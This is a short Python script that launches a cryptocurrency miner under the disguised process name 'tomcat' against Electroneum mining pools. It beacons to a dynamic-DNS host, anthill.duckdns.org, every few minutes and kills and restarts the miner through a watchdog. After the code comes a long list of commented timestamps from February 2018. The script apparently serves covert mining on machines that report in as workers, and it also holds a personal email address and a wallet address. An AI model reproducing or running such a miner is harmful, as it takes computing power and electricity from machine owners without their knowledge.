import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:35:01.406107
#2018-02-17 17:23:01.880465
#2018-02-17 19:12:06.183655
#2018-02-17 21:02:05.213064
#2018-02-17 22:47:04.260356
#2018-02-18 00:31:01.500712
#2018-02-18 02:21:01.863644
#2018-02-18 04:08:04.911843
#2018-02-18 05:59:03.356947
#2018-02-18 07:49:04.782452
#2018-02-18 09:37:01.443383
#2018-02-18 11:23:04.159410
#2018-02-18 13:09:01.595827
#2018-02-18 14:57:03.542051
#2018-02-18 16:46:03.697109
#2018-02-18 18:34:02.191908
#2018-02-18 20:21:06.139427
#2018-02-18 22:07:03.320300
#2018-02-18 23:55:06.065275
#2018-02-19 01:41:05.730190
#2018-02-19 03:29:06.490571
#2018-02-19 05:15:06.740115
#2018-02-19 07:03:05.978954
#2018-02-19 08:51:06.383849
#2018-02-19 10:40:07.869690
#2018-02-19 12:28:05.605344
#2018-02-19 14:14:05.799002
#2018-02-19 16:03:07.828115
#2018-02-19 17:50:07.330377
#2018-02-19 19:36:08.782419
#2018-02-19 21:25:09.373707
#2018-02-19 23:10:07.053387
#2018-02-20 00:57:06.687989
#2018-02-20 02:46:05.996608
#2018-02-20 04:34:04.287474
#2018-02-20 06:17:08.224521
#2018-02-20 08:02:07.376996
#2018-02-20 09:47:06.932884
#2018-02-20 11:32:04.802508
#2018-02-20 13:19:04.615053
#2018-02-20 15:05:02.585933
#2018-02-20 16:51:05.751518
#2018-02-20 18:39:01.331998
#2018-02-20 20:29:07.473153
#2018-02-20 22:15:08.442846
#2018-02-20 23:57:07.515006
#2018-02-21 01:41:04.896256
#2018-02-21 03:29:03.893738
#2018-02-21 05:17:05.422631
#2018-02-21 07:05:21.447475
#2018-02-21 08:51:06.831211
#2018-02-21 10:38:04.726091
#2018-02-21 12:27:05.966676
#2018-02-21 14:15:01.669599
#2018-02-21 16:02:06.573264
#2018-02-21 17:54:07.352909
#2018-02-21 19:41:08.494755
#2018-02-21 21:29:06.610590
#2018-02-21 23:15:06.285145
#2018-02-22 01:59:03.559169
#2018-02-22 03:46:05.609279
#2018-02-22 05:32:08.352299
#2018-02-22 07:17:01.836114
#2018-02-22 09:05:01.308515
#2018-02-22 10:53:02.204490
#2018-02-22 12:38:07.267593
#2018-02-22 14:24:08.925605
#2018-02-22 16:11:05.869365
#2018-02-22 17:57:13.201169
#2018-02-22 19:46:06.363861
#2018-02-22 21:36:06.298418
#2018-02-22 23:23:04.067148
#2018-02-23 01:11:04.274458
#2018-02-23 02:59:06.543444
#2018-02-23 04:46:05.709741
#2018-02-23 06:30:07.193431
#2018-02-23 08:17:06.122768
#2018-02-23 10:34:07.989760
#2018-02-23 12:27:03.855500
#2018-02-23 14:15:05.604339
#2018-02-23 16:06:09.484039
#2018-02-23 18:11:06.825278
#2018-02-23 19:56:01.970609
#2018-02-23 21:39:05.732492
#2018-02-23 23:28:02.015367
#2018-02-24 01:20:09.046305
#2018-02-24 03:12:04.930755
#2018-02-24 04:57:02.269463
#2018-02-24 06:41:04.443241
#2018-02-24 08:30:01.655829
#2018-02-24 10:17:04.588002
#2018-02-24 12:13:02.079438
#2018-02-24 14:01:05.755998
#2018-02-24 15:52:03.444232
#2018-02-24 17:46:03.410299
#2018-02-24 19:34:04.172074
#2018-02-24 21:21:04.290569
#2018-02-25 00:03:06.781313
#2018-02-25 03:17:05.188407
#2018-02-25 06:04:01.464573
#2018-02-25 10:35:01.774614
#2018-02-25 12:08:01.670213
#2018-02-25 14:20:03.847586
#2018-02-25 15:55:02.952850